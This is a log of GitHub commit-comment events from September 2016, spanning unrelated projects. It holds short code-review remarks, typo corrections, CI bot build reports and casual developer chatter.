{"id":"4530246936","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18935651,"position":null,"line":null,"path":null,"commit_id":"c971683298a2209182f612f570dae6caec08e655","created_at":"2016-09-07T21:02:15Z","updated_at":"2016-09-07T21:02:15Z","body":"++ thanks!"}},"created_at":"2016-09-07T21:02:15Z"}
{"id":"4530247554","type":"CommitCommentEvent","actor":{"login":"manups4e"},"repo":{"name":"Grarak/android_device_oneplus_oneplus2"},"payload":{"comment":{"id":18935653,"position":null,"line":null,"path":null,"commit_id":"53ec4a49a443bcc293a2d57bd04781c2b5cab206","created_at":"2016-09-07T21:02:22Z","updated_at":"2016-09-07T21:02:22Z","body":"if this may help, oppo_common builds fine and i don't get bootable_recovery error when compiling whit this commit http://review.cyanogenmod.org/#/c/160277/"}},"created_at":"2016-09-07T21:02:22Z"}
{"id":"4530250043","type":"CommitCommentEvent","actor":{"login":"wvega"},"repo":{"name":"jorgeatorres/growabeard"},"payload":{"comment":{"id":18935657,"position":null,"line":null,"path":null,"commit_id":"8008cbb54aca48c5bdf1b7a0c563597f33360b0e","created_at":"2016-09-07T21:02:48Z","updated_at":"2016-09-07T21:02:48Z","body":"I used this approach before noticing the following line in `wsgi.py`:\r\n\r\n    os.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"growabeard.settings\")\r\n\r\nWe  could use that environment variable to remove some of the code I added above and preventing the application from knowing too much about the environment it is running on."}},"created_at":"2016-09-07T21:02:48Z"}
{"id":"4530256117","type":"CommitCommentEvent","actor":{"login":"svambati"},"repo":{"name":"svambati/game-of-life"},"payload":{"comment":{"id":18935674,"position":null,"line":null,"path":null,"commit_id":"12b1189f7f4c3d8f3cfabcb8476fd62f05d1b42b","created_at":"2016-09-07T21:03:51Z","updated_at":"2016-09-07T21:03:51Z","body":"dadad"}},"created_at":"2016-09-07T21:03:51Z"}
{"id":"4530256467","type":"CommitCommentEvent","actor":{"login":"sergeyklay"},"repo":{"name":"phalcon/docs"},"payload":{"comment":{"id":18935676,"position":null,"line":null,"path":null,"commit_id":"a1061ea579fa83fff8bd95817514ec64b852b18d","created_at":"2016-09-07T21:03:54Z","updated_at":"2016-09-07T21:03:54Z","body":"![screenshot at sep 08 00-03-19](https://cloud.githubusercontent.com/assets/1256298/18328506/b8da4810-7557-11e6-87ac-76317fdbe22d.png)\r\n"}},"created_at":"2016-09-07T21:03:54Z"}
{"id":"4530256950","type":"CommitCommentEvent","actor":{"login":"saurik"},"repo":{"name":"nowsecure/frida-cycript"},"payload":{"comment":{"id":18935677,"position":null,"line":null,"path":null,"commit_id":"329682b3187da4b856e83c95536525a73643697e","created_at":"2016-09-07T21:04:00Z","updated_at":"2016-09-07T21:04:00Z","body":"This is not diagnostics output: this is how you know the grammar isn't invalid, to maintain the accuracy of my lexer hacks. Most of those don't output: they stop the build. I take it this 1) means you don't know much about bison and, together with all of the other insane changes you've been making, 2) underscores the lie you told about trying to make minimal changes so you could track upstream (which isn't surprising, I guess)."}},"created_at":"2016-09-07T21:04:00Z"}
{"id":"4530258108","type":"CommitCommentEvent","actor":{"login":"atjonathan"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":18935678,"position":null,"line":null,"path":null,"commit_id":"3c6af209fab836cf3fb333503d2741df1162866d","created_at":"2016-09-07T21:04:13Z","updated_at":"2016-09-07T21:04:13Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;kvYAR2ml&#x2F;26-replacing-rethinkdb-with-mongodb\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Replacing rethinkDB with mongoDB</a>"}},"created_at":"2016-09-07T21:04:13Z"}
{"id":"4530262643","type":"CommitCommentEvent","actor":{"login":"atjonathan"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":18935691,"position":null,"line":null,"path":null,"commit_id":"3c6af209fab836cf3fb333503d2741df1162866d","created_at":"2016-09-07T21:05:02Z","updated_at":"2016-09-07T21:05:02Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;700KXuBe&#x2F;10-authentication\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Authentication</a>"}},"created_at":"2016-09-07T21:05:02Z"}
{"id":"4530263209","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18935692,"position":null,"line":null,"path":null,"commit_id":"8499afd68a7a5238c88afec06519cfc80013c850","created_at":"2016-09-07T21:05:11Z","updated_at":"2016-09-07T21:05:11Z","body":"I put up a vote. 16:1 to remove it. So off it went. A new AI will be added in its place in the future."}},"created_at":"2016-09-07T21:05:11Z"}
{"id":"4530265916","type":"CommitCommentEvent","actor":{"login":"ls42"},"repo":{"name":"jfrazelle/.vim"},"payload":{"comment":{"id":18935700,"position":null,"line":null,"path":null,"commit_id":"08d4b3aec472209bc006930af43c93bb97103afe","created_at":"2016-09-07T21:05:38Z","updated_at":"2016-09-07T21:05:38Z","body":"Well, that's even better :smile: "}},"created_at":"2016-09-07T21:05:38Z"}
{"id":"4530269335","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18935708,"position":null,"line":null,"path":null,"commit_id":"8499afd68a7a5238c88afec06519cfc80013c850","created_at":"2016-09-07T21:06:16Z","updated_at":"2016-09-07T21:06:16Z","body":"If you're really bothered I can dump the nasty mess in a plugin. This came from a plugin to begin with."}},"created_at":"2016-09-07T21:06:16Z"}
{"id":"4530270558","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18935709,"position":null,"line":null,"path":null,"commit_id":"b9012bdaf01fd6e08552890ac573aca2757d8f35","created_at":"2016-09-07T21:06:29Z","updated_at":"2016-09-07T21:06:29Z","body":"The following doc(s) have been deployed to the [terminusma](https://terminusma-static-docs.pantheonsite.io/docs) Multidev environment:\n- [source/_views/default.html](https://github.com/pantheon-systems/documentation/commit/31b2d2154d95e55a9ec3fdf1052de671ceb49593/source/_views/default.html)\n- [source/_views/terminuspage.html](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/_views/terminuspage.html)\n- [source/docs/_terminuspages/03-examples.html](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/03-examples.html)\n- [source/docs/_terminuspages/03-examples.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/03-examples.md)\n- [source/docs/_terminuspages/04-extend.html](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/04-extend.html)\n- [source/docs/_terminuspages/04-extend.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/04-extend.md)\n- [source/docs/_terminuspages/05-commands.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/05-commands.md)\n- [source/docs/_terminuspages/05-plugins.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/05-plugins.md)\n- [source/docs/_terminuspages/06-commands.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/06-commands.md)\n- [source/docs/_terminuspages/06-versions.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/06-versions.md)\n- [source/docs/_terminuspages/07-versions.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/07-versions.md)\n- [source/docs/assets/css/main.css](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/assets/css/main.css)\n- [app/config/sculpin_site.yml](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/app/config/sculpin_site.yml)\n- [source/_partials/terminus_navbar.html](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/_partials/terminus_navbar.html)\n- [source/docs/_terminuspages/01-getting-started.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/01-getting-started.md)\n- [source/docs/_terminuspages/02-install.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/02-install.md)\n- [source/docs/_terminuspages/commands.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/commands.md)\n- [source/docs/_terminuspages/contribute.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/contribute.md)\n- [source/docs/_terminuspages/contribute/style-guide.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/contribute/style-guide.md)\n- [source/docs/_terminuspages/examples.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/examples.md)\n- [source/docs/_terminuspages/extend.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/extend.md)\n- [source/docs/_terminuspages/extend/create-plugins.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/extend/create-plugins.md)\n- [source/docs/_terminuspages/extend/plugins.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/extend/plugins.md)\n- [source/docs/_terminuspages/getting-started.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/getting-started.md)\n- [source/docs/_terminuspages/install.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/install.md)\n- [source/docs/_terminuspages/versions.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/versions.md)\n- [scripts/deploy-multidev.sh](https://github.com/pantheon-systems/documentation/commit/654a8bf1b495c39f03d762862684f1e500a09e5f/scripts/deploy-multidev.sh)\n- [app/config/sculpin_kernel.yml](https://github.com/pantheon-systems/documentation/commit/b9012bdaf01fd6e08552890ac573aca2757d8f35/app/config/sculpin_kernel.yml)\n- [app/config/sculpin_services.yml](https://github.com/pantheon-systems/documentation/commit/b9012bdaf01fd6e08552890ac573aca2757d8f35/app/config/sculpin_services.yml)\n- [docs/guides/terminus](https://terminusma-static-docs.pantheonsite.io/docs/guides/terminus)\n- [docs/terminus/commands](https://terminusma-static-docs.pantheonsite.io/docs/terminus/commands)\n- [docs/terminus/examples](https://terminusma-static-docs.pantheonsite.io/docs/terminus/examples)\n- [docs/terminus/install](https://terminusma-static-docs.pantheonsite.io/docs/terminus/install)\n- [source/_partials/contributor_box.twig](https://github.com/pantheon-systems/documentation/commit/b9012bdaf01fd6e08552890ac573aca2757d8f35/source/_partials/contributor_box.twig)\n- [source/_partials/footer_scripts.html](https://github.com/pantheon-systems/documentation/commit/b9012bdaf01fd6e08552890ac573aca2757d8f35/source/_partials/footer_scripts.html)\n- [source/_views/posts.html](https://github.com/pantheon-systems/documentation/commit/b9012bdaf01fd6e08552890ac573aca2757d8f35/source/_views/posts.html)\n- [source/_views/taxon.html](https://github.com/pantheon-systems/documentation/commit/b9012bdaf01fd6e08552890ac573aca2757d8f35/source/_views/taxon.html)\n"}},"created_at":"2016-09-07T21:06:29Z"}
{"id":"4530270669","type":"CommitCommentEvent","actor":{"login":"chrisz"},"repo":{"name":"chrisz/pyhusmow"},"payload":{"comment":{"id":18935710,"position":null,"line":null,"path":null,"commit_id":"553b67950a226d922323217437fc7d63ade95986","created_at":"2016-09-07T21:06:30Z","updated_at":"2016-09-07T21:06:30Z","body":":-)"}},"created_at":"2016-09-07T21:06:30Z"}
{"id":"4530271513","type":"CommitCommentEvent","actor":{"login":"JimRustin"},"repo":{"name":"JimRustin/hello-world"},"payload":{"comment":{"id":18935712,"position":null,"line":null,"path":null,"commit_id":"5c0335b36b2db175d62fffdb5bd6005a7c68c544","created_at":"2016-09-07T21:06:40Z","updated_at":"2016-09-07T21:06:40Z","body":"i do not know what i am doing"}},"created_at":"2016-09-07T21:06:40Z"}
{"id":"4530271761","type":"CommitCommentEvent","actor":{"login":"Jkuntze1981"},"repo":{"name":"Jkuntze1981/jean"},"payload":{"comment":{"id":18935713,"position":null,"line":null,"path":null,"commit_id":"617278e03c68672e42d18cdb5720cd5bd43b89ab","created_at":"2016-09-07T21:06:43Z","updated_at":"2016-09-07T21:06:43Z","body":"ccc"}},"created_at":"2016-09-07T21:06:43Z"}
{"id":"4530273871","type":"CommitCommentEvent","actor":{"login":"01micko"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18935723,"position":124,"line":176,"path":"woof-code/rootfs-skeleton/usr/bin/dir2pet","commit_id":"cd80fb134b90b0b3833f160cb34cf2b211a94d24","created_at":"2016-09-07T21:07:08Z","updated_at":"2016-09-07T21:07:08Z","body":"@rserwin1 I think you missed the point of my intentions with the $comp variable. It was only designed as default for the 'skip' option. 'xz' was to be the default for the interactive mode with gzip default if the chip was an arm device. this was quite intentional and @zigbert has so far complained.\r\n\r\nIs there a reason you wanted the default to be gzip?"}},"created_at":"2016-09-07T21:07:08Z"}
{"id":"4530282616","type":"CommitCommentEvent","actor":{"login":"peterlazar1993"},"repo":{"name":"m-arav/Kitsunae"},"payload":{"comment":{"id":18935744,"position":null,"line":null,"path":null,"commit_id":"6c90ca933b35476fc368edeeedb477846bec4034","created_at":"2016-09-07T21:08:49Z","updated_at":"2016-09-07T21:08:49Z","body":"`source-map` will work for our purpose. But this is a suggested reading regarding source maps\r\nhttp://cheng.logdown.com/posts/2016/03/25/679045\r\n\r\nThere are other options we can use in production and development so that it optimises for smaller bundles in production and more readability in development."}},"created_at":"2016-09-07T21:08:49Z"}
{"id":"4530288120","type":"CommitCommentEvent","actor":{"login":"HenrrySalinasJala"},"repo":{"name":"HenrrySalinasJala/poc_xpress"},"payload":{"comment":{"id":18935756,"position":20,"line":47,"path":"src/test/java/com/jalasoft/xpress/cucumber/stepdefinition/project/ProjectStepDef.java","commit_id":"4f314a99c52b3f1029049aea2159892b25bcc8bf","created_at":"2016-09-07T21:09:52Z","updated_at":"2016-09-07T21:09:52Z","body":"it should be final\r\n"}},"created_at":"2016-09-07T21:09:52Z"}
{"id":"4530298507","type":"CommitCommentEvent","actor":{"login":"Nirgalz"},"repo":{"name":"eBrigade/eBrigadeV2"},"payload":{"comment":{"id":18935779,"position":null,"line":null,"path":null,"commit_id":"2919545939cde1c752f81afc73307444640b6e50","created_at":"2016-09-07T21:11:49Z","updated_at":"2016-09-07T21:11:49Z","body":"Merci pour les instructions et pages.\r\nConcernant les pages de gestion d'un événement, étant donné le nombre de controllers et d'action en jeu sur une view, je vois deux solutions : \r\n1. bidouiller un controller qui gère tout ça sur une vue\r\n2. décomposer en une ou plusieurs cells qui séparent les actions en fonctions et en views ensuite intégrées sur une page.\r\n\r\nL'option 2 me semble la plus adaptée aux conventions de cake et utilise plus la logique mvc, et surtout permet de réutiliser ces cells pour tout type d'événement selon le contexte, mais j'ai le sentiment de louper une 3e solution..."}},"created_at":"2016-09-07T21:11:49Z"}
{"id":"4530304220","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":18935787,"position":null,"line":null,"path":null,"commit_id":"e3485a679046b9cea78ffef665c6ce051442d5a8","created_at":"2016-09-07T21:12:53Z","updated_at":"2016-09-07T21:12:53Z","body":"all tests pass:\nsuccess: http://buildbot.bos1/builders/test-riak_core/builds/2070\n"}},"created_at":"2016-09-07T21:12:53Z"}
{"id":"4530304297","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935788,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T21:12:54Z","updated_at":"2016-09-07T21:12:54Z","body":"What!"}},"created_at":"2016-09-07T21:12:54Z"}
{"id":"4530308861","type":"CommitCommentEvent","actor":{"login":"sbrossie"},"repo":{"name":"killbill/killbill"},"payload":{"comment":{"id":18935799,"position":39,"line":520,"path":"payment/src/main/java/org/killbill/billing/payment/core/PaymentProcessor.java","commit_id":"43550c3ff7454265054c68c202e5b5fcd79c5d75","created_at":"2016-09-07T21:13:45Z","updated_at":"2016-09-07T21:13:45Z","body":"The query you made to retrieve `allPaymentTransactionsForKey` was given a context, which means only the transactions matching that `paymentStateContext.getPaymentTransactionExternalKey()` and our tenant (`internalCallContext `) were returned. So, based on that, we would never find any `PAYMENT_TRANSACTION_DIFFERENT_ACCOUNT_ID` (and that `if` becomes irrelevant ?)\r\n"}},"created_at":"2016-09-07T21:13:45Z"}
{"id":"4530309920","type":"CommitCommentEvent","actor":{"login":"Seliro"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":18935802,"position":null,"line":null,"path":null,"commit_id":"da9e03c15b81d62bd6faf086350651976f94976b","created_at":"2016-09-07T21:13:58Z","updated_at":"2016-09-07T21:13:58Z","body":"gotta be lucky to find it in a cam then"}},"created_at":"2016-09-07T21:13:58Z"}
{"id":"4530310099","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935804,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T21:14:00Z","updated_at":"2016-09-07T21:14:00Z","body":"Ha! It worked:\r\nIf you want to implement your Script for voting for Maryville v Alcoa, do it fast, they're taking it down today!"}},"created_at":"2016-09-07T21:14:00Z"}
{"id":"4530312538","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18935818,"position":null,"line":null,"path":null,"commit_id":"aaeb6a1593327a2b1968b149ed7758fc61fe3d55","created_at":"2016-09-07T21:14:27Z","updated_at":"2016-09-07T21:14:27Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - i386-Windows-7-VisualStudio-12: OK (2331 of 2334 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: ZSZ big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aaeb6a1593327a2b1968b149ed7758fc61fe3d55-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aaeb6a1593327a2b1968b149ed7758fc61fe3d55-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-07T21:14:27Z"}
{"id":"4530313926","type":"CommitCommentEvent","actor":{"login":"bsiege"},"repo":{"name":"webmin/webmin"},"payload":{"comment":{"id":18935820,"position":null,"line":null,"path":null,"commit_id":"22c8d8d0417f4a11d41b5d430b5e1769518e0f52","created_at":"2016-09-07T21:14:42Z","updated_at":"2016-09-07T21:14:42Z","body":"It is /usr/local/etc/webmin/ipfw/config under freebsd. But still displayed as Version 1 in Module. Sorry..."}},"created_at":"2016-09-07T21:14:42Z"}
{"id":"4530314759","type":"CommitCommentEvent","actor":{"login":"yangh25"},"repo":{"name":"wow1881/flybu-hangman"},"payload":{"comment":{"id":18935821,"position":null,"line":null,"path":null,"commit_id":"633df2bc6041ff137483e2a8885895aba0ec74a2","created_at":"2016-09-07T21:14:53Z","updated_at":"2016-09-07T21:14:53Z","body":"thanks!! =)"}},"created_at":"2016-09-07T21:14:53Z"}
{"id":"4530316837","type":"CommitCommentEvent","actor":{"login":"philikon"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":18935831,"position":null,"line":null,"path":null,"commit_id":"970f9335a9ec75cccbbe80b45696c271cc33113c","created_at":"2016-09-07T21:15:14Z","updated_at":"2016-09-07T21:15:14Z","body":"Weird, does FB's setup not have a `default.config.js` that provides a fallback implementation?\r\n\r\nhttps://github.com/facebook/react-native/blob/970f9335a9ec75cccbbe80b45696c271cc33113c/local-cli/cliEntry.js#L95\r\nhttps://github.com/facebook/react-native/blob/970f9335a9ec75cccbbe80b45696c271cc33113c/local-cli/util/Config.js#L44"}},"created_at":"2016-09-07T21:15:14Z"}
{"id":"4530318520","type":"CommitCommentEvent","actor":{"login":"sbrossie"},"repo":{"name":"killbill/killbill"},"payload":{"comment":{"id":18935835,"position":null,"line":null,"path":null,"commit_id":"283c727e0c4d49174dc67118a48ae8b13cf98e4c","created_at":"2016-09-07T21:15:33Z","updated_at":"2016-09-07T21:15:33Z","body":"Ah ah... yes ( i am guessing this matches all other payment operations)."}},"created_at":"2016-09-07T21:15:33Z"}
{"id":"4530321673","type":"CommitCommentEvent","actor":{"login":"artrag"},"repo":{"name":"artrag/transballmsx"},"payload":{"comment":{"id":18935844,"position":27,"line":417,"path":"src/transball-input.asm","commit_id":"4dce18999746317baee815507fae429b7931bb88","created_at":"2016-09-07T21:16:10Z","updated_at":"2016-09-07T21:16:10Z","body":"no need, a is 2 here"}},"created_at":"2016-09-07T21:16:10Z"}
{"id":"4530325911","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935859,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T21:16:55Z","updated_at":"2016-09-07T21:16:55Z","body":"My language of choice: vbs"}},"created_at":"2016-09-07T21:16:55Z"}
{"id":"4530329190","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935869,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T21:17:31Z","updated_at":"2016-09-07T21:17:31Z","body":"So, you're computer of choice:\r\nNOT the school laptop."}},"created_at":"2016-09-07T21:17:31Z"}
{"id":"4530331354","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935880,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T21:17:54Z","updated_at":"2016-09-07T21:17:54Z","body":"(On the school laptop, you have to do some weird thing with Powershell)"}},"created_at":"2016-09-07T21:17:54Z"}
{"id":"4530335018","type":"CommitCommentEvent","actor":{"login":"Lakylelyttle2019"},"repo":{"name":"Lakylelyttle2019/Lakylelyttle2019.github.io"},"payload":{"comment":{"id":18935897,"position":null,"line":null,"path":null,"commit_id":"d5a3880202141a62885dec0acc644dbee6434bfa","created_at":"2016-09-07T21:18:35Z","updated_at":"2016-09-07T21:18:35Z","body":"But of course I moved the copy of the element over to another branch and didn't realize it would display this instead.."}},"created_at":"2016-09-07T21:18:35Z"}
{"id":"4530337814","type":"CommitCommentEvent","actor":{"login":"dennisss"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":18935901,"position":1,"line":1,"path":"cmake/configs/nuttx_crazyflie_default.cmake","commit_id":"1b4dabea9f018d406bea8d3453b2a0566c787ab1","created_at":"2016-09-07T21:19:06Z","updated_at":"2016-09-07T21:19:06Z","body":"@davids5, I was able to get a boot console working. With a single mavlink instance running on ACM0 and I think no nshterms started, \"mavlink status\" shows txerr's with no successful transfers. Looking into it, it seems that FIONWRITE is always returning too small of a value. Removing the buffer size check in mavlink seems to make TX work fine. RX still causing issues. Any thoughts on which settings would effect this?"}},"created_at":"2016-09-07T21:19:06Z"}
{"id":"4530342672","type":"CommitCommentEvent","actor":{"login":"otisg"},"repo":{"name":"megastef/logagent-nodejs-monitor"},"payload":{"comment":{"id":18935920,"position":7,"line":6,"path":"README.md","commit_id":"dacecb5b1a25ca3451cfb5efba5daebbb85123fd","created_at":"2016-09-07T21:19:59Z","updated_at":"2016-09-07T21:19:59Z","body":"colume => volume"}},"created_at":"2016-09-07T21:19:59Z"}
{"id":"4530344422","type":"CommitCommentEvent","actor":{"login":"otisg"},"repo":{"name":"megastef/logagent-nodejs-monitor"},"payload":{"comment":{"id":18935925,"position":17,"line":16,"path":"README.md","commit_id":"dacecb5b1a25ca3451cfb5efba5daebbb85123fd","created_at":"2016-09-07T21:20:20Z","updated_at":"2016-09-07T21:20:20Z","body":"follwoing => following"}},"created_at":"2016-09-07T21:20:20Z"}
{"id":"4530344735","type":"CommitCommentEvent","actor":{"login":"artrag"},"repo":{"name":"artrag/transballmsx"},"payload":{"comment":{"id":18935927,"position":31,"line":112,"path":"src/transball-scroll.asm","commit_id":"4dce18999746317baee815507fae429b7931bb88","created_at":"2016-09-07T21:20:23Z","updated_at":"2016-09-07T21:20:23Z","body":"This would save 3 bytes\r\n\r\n`    ld a,(useSmoothScroll)\r\n    cp 2\r\n    jp z,Set_SmoothScroll_Interrupt_MSX2P\r\n    ld hl,MSX2_SmoothScroll_Interrupt\r\n    jp Set_SmoothScroll_Interrupt_continue\r\nSet_SmoothScroll_Interrupt_MSX2P:\r\n      ld hl,MSX2P_SmoothScroll_Interrupt\t\t      ld hl,MSX2P_SmoothScroll_Interrupt\r\n Set_SmoothScroll_Interrupt_continue:\r\n      ld (HKEY+1),hl\r\n`\r\n\r\n"}},"created_at":"2016-09-07T21:20:23Z"}
{"id":"4530346514","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18935932,"position":null,"line":null,"path":null,"commit_id":"14a51e8dcf766011dbded7d2b1657a9da037fb94","created_at":"2016-09-07T21:20:44Z","updated_at":"2016-09-07T21:20:44Z","body":"The following doc(s) have been deployed to the [1863migrat](https://1863migrat-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/migrate-manual](https://1863migrat-static-docs.pantheonsite.io/docs/migrate-manual)\n"}},"created_at":"2016-09-07T21:20:44Z"}
{"id":"4530348498","type":"CommitCommentEvent","actor":{"login":"otisg"},"repo":{"name":"megastef/logagent-nodejs-monitor"},"payload":{"comment":{"id":18935938,"position":4,"line":3,"path":"README.md","commit_id":"dacecb5b1a25ca3451cfb5efba5daebbb85123fd","created_at":"2016-09-07T21:21:07Z","updated_at":"2016-09-07T21:21:07Z","body":"loagagent => logagent"}},"created_at":"2016-09-07T21:21:07Z"}
{"id":"4530349907","type":"CommitCommentEvent","actor":{"login":"atutor"},"repo":{"name":"atutor/pdf_converter"},"payload":{"comment":{"id":18935944,"position":2,"line":2,"path":"side_menu.inc.php","commit_id":"132666c0f4e196e7d62876f3e890fd408a9b1e27","created_at":"2016-09-07T21:21:22Z","updated_at":"2016-09-07T21:21:22Z","body":"Global $savant needs to be uncommented, instead of removed. If the side menu block is the first in the stack, it will break without it."}},"created_at":"2016-09-07T21:21:22Z"}
{"id":"4530354584","type":"CommitCommentEvent","actor":{"login":"bsclifton"},"repo":{"name":"brave/electron"},"payload":{"comment":{"id":18935956,"position":47,"line":47,"path":"atom/browser/api/atom_api_autofill.h","commit_id":"1e3574bca24cdc95745d420563fd859cb3d795d2","created_at":"2016-09-07T21:22:15Z","updated_at":"2016-09-07T21:22:15Z","body":"++ on that- always better to use a reference than have it copy the object :smile: "}},"created_at":"2016-09-07T21:22:15Z"}
{"id":"4530358830","type":"CommitCommentEvent","actor":{"login":"berloc"},"repo":{"name":"CodecoolBP20161/python-school-system-with-orm-code-la-bor"},"payload":{"comment":{"id":18935965,"position":null,"line":null,"path":null,"commit_id":"4a2461e0bcc64dd178aa922d784c064b33fe5eba","created_at":"2016-09-07T21:23:02Z","updated_at":"2016-09-07T21:23:02Z","body":"we can list the interviews"}},"created_at":"2016-09-07T21:23:02Z"}
{"id":"4530360555","type":"CommitCommentEvent","actor":{"login":"philikon"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":18935970,"position":146,"line":102,"path":"local-cli/server/server.js","commit_id":"e8b508144fdcdea436cf4d80d99daec757505c70","created_at":"2016-09-07T21:23:20Z","updated_at":"2016-09-07T21:23:20Z","body":"Sadly this was based on an outdated argument definition and broke some CLI behaviour, specifically #7961. I suspect you would've gotten a merge conflict that wasn't resolved properly. I'll submit a fix."}},"created_at":"2016-09-07T21:23:20Z"}
